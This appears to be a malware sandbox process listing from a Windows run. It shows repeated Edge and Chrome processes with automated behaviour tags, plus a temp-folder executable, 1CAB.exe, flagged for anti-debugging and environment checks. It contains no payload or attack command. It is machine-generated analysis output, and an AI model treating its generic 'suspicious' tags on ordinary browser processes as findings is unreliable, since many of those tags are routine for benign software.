C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\1CAB.exeC:\Users\Admin\AppData\Local\Temp\1CAB.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffd7a3d4f50,0x7ffd7a3d4f60,0x7ffd7a3d4f702⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2720 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2240 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1840 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1792 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4476 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4308 /prefetch:82⤵
- Modifies data under HKEY_USERS
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4636 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4780 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4920 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5180 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4888 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5036 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3664 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:12⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1536 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5280 /prefetch:82⤵
- Checks SCSI registry key(s)
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3784 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3812 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3820 /prefetch:82⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1728,10071131952609581917,14991022000352667967,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4692 /prefetch:82⤵
-
-
